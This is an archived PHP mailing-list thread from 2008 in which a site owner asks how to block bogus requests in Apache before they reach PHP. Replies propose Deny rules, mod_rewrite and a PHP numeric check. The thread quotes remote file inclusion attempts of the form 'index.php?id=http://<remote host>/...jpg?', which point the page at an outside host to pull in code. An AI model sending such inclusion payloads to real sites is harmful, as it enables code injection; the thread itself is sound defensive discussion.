Apache blocking certain requests instead of php

I'm getting a lot of bogus requsts in the form of
"index.php?id=http://64.15.67.17/~babysona/logo.jpg?", sometimes more than a
hundred a day per domain. The php script catches it, logs the request, sends
an email report and replies with "access denied", but it takes processing
which I'd rather not have php busy with. (The php script rejects anything
where id=something_not_numeric.) Is there a way for apache to catch these
requests before passing it to php? Is it more efficient for apache to handle
this than php?

Arno

Arno Kuhl wrote:

> Is there a
> way for apache to catch these requests before passing it to php? Is it
> more efficient for apache to handle this than php?

2 x yes. I think you could probably use <LocationMatch> and ban all
access with "Deny from all".


/Per Jessen, Zürich

Arno Kuhl wrote:
> I'm getting a lot of bogus requsts in the form of
> "index.php?id=http://64.15.67.17/~babysona/logo.jpg?", sometimes more than a
> hundred a day per domain. The php script catches it, logs the request, sends
> an email report and replies with "access denied", but it takes processing
> which I'd rather not have php busy with. (The php script rejects anything
> where id=something_not_numeric.) Is there a way for apache to catch these
> requests before passing it to php? Is it more efficient for apache to handle
> this than php?
>
> Arno
>
>

Yes, in Apache turn off userdir access

In your httpd.conf file do this.

UserDir disabled

That way it will not process url that starts with a tildy ~...

That should take care of it. Apache should then only report a 404 error to
the error log for the given virtual host.

--
Jim Lucas

"Some men are born to greatness, some achieve greatness,
and some have greatness thrust upon them."

Twelfth Night, Act II, Scene V
by William Shakespeare

> I'm getting a lot of bogus requsts in the form of
> "index.php?id=http://64.15.67.17/~babysona/logo.jpg?", sometimes more
> than a hundred a day per domain. The php script catches it, logs the
> request, sends an email report and replies with "access denied", but
> it takes processing which I'd rather not have php busy with. (The php
> script rejects anything where id=something_not_numeric.) Is there a
> way for apache to catch these requests before passing it to php? Is it
> more efficient for apache to handle this than php?
>
> Arno
>

Yes, in Apache turn off userdir access
In your httpd.conf file do this.
UserDir disabled
That way it will not process url that starts with a tildy ~...
That should take care of it. Apache should then only report a 404 error to
the error log for the given virtual host.

--
Thanks for the reply. Is that correct htough? I always thought in the
example
http://mysite.com/index.php?id=http:...sona/logo.jpg?
the url started with index.php...

Most the requests though look more like
http://mysite.com/index.php?id=http:....su/caleb.htm?
without the tilde.

I was hoping there's a way to tell apache to block requests where
id=non_numeric.

Cheers
Arno

> I was hoping there's a way to tell apache to block requests where
> id=non_numeric.

It's trying to do a remote inclusion.

It's easy for you to fix in php:

if (isset($_GET['id'])) {
if (!is_numeric($_GET['id'])) {
die("Die hacker die!");
}
}

I'm sure there would be a way to do it with ModRewrite or something but
it's 5 lines of code in php so I'd do it there *shrug*.

--
Postgresql & php tutorials
http://www.designmagick.com/

On Thursday 24 July 2008 09:14:55 Chris wrote:
> > I was hoping there's a way to tell apache to block requests where
> > id=non_numeric.
>
> It's trying to do a remote inclusion.
>
> It's easy for you to fix in php:
>
> if (isset($_GET['id'])) {
> if (!is_numeric($_GET['id'])) {
> die("Die hacker die!");

thats sudden! ;)

> }
> }
>
> I'm sure there would be a way to do it with ModRewrite or something but
> it's 5 lines of code in php so I'd do it there *shrug*.
>
> --
> Postgresql & php tutorials
> http://www.designmagick.com/



--
---
Børge Holen
http://www.arivene.net

> I was hoping there's a way to tell apache to block requests where
> id=non_numeric.

It's trying to do a remote inclusion.

It's easy for you to fix in php:

if (isset($_GET['id'])) {
if (!is_numeric($_GET['id'])) {
die("Die hacker die!");
}
}

I'm sure there would be a way to do it with ModRewrite or something but it's
5 lines of code in php so I'd do it there *shrug*.

--
Thanks, I'm already doing something like that, but I want to stop it getting
to php.

Cheers
Arno

Børge Holen wrote:
> On Thursday 24 July 2008 09:14:55 Chris wrote:
>>> I was hoping there's a way to tell apache to block requests where
>>> id=non_numeric.
>> It's trying to do a remote inclusion.
>>
>> It's easy for you to fix in php:
>>
>> if (isset($_GET['id'])) {
>> if (!is_numeric($_GET['id'])) {
>> die("Die hacker die!");
>
> thats sudden! ;)

ok maybe a bit harsh :P

stop hacker stop ?

;)

--
Postgresql & php tutorials
http://www.designmagick.com/

> Thanks, I'm already doing something like that, but I want to stop it getting
> to php.

http://httpd.apache.org/docs/2.0/mod/mod_rewrite.html

Ask on an apache list how to use it.

--
Postgresql & php tutorials
http://www.designmagick.com/

On Thursday 24 July 2008 09:38:57 Chris wrote:
> Børge Holen wrote:
> > On Thursday 24 July 2008 09:14:55 Chris wrote:
> >>> I was hoping there's a way to tell apache to block requests where
> >>> id=non_numeric.
> >>
> >> It's trying to do a remote inclusion.
> >>
> >> It's easy for you to fix in php:
> >>
> >> if (isset($_GET['id'])) {
> >> if (!is_numeric($_GET['id'])) {
> >> die("Die hacker die!");
> >
> > thats sudden! ;)
>
> ok maybe a bit harsh :P
>
> stop hacker stop ?

I prefer die("");
it leaves a bit unsatisfaction for whoever generates the blank page


>
> ;)
>
> --
> Postgresql & php tutorials
> http://www.designmagick.com/



--
---
Børge Holen
http://www.arivene.net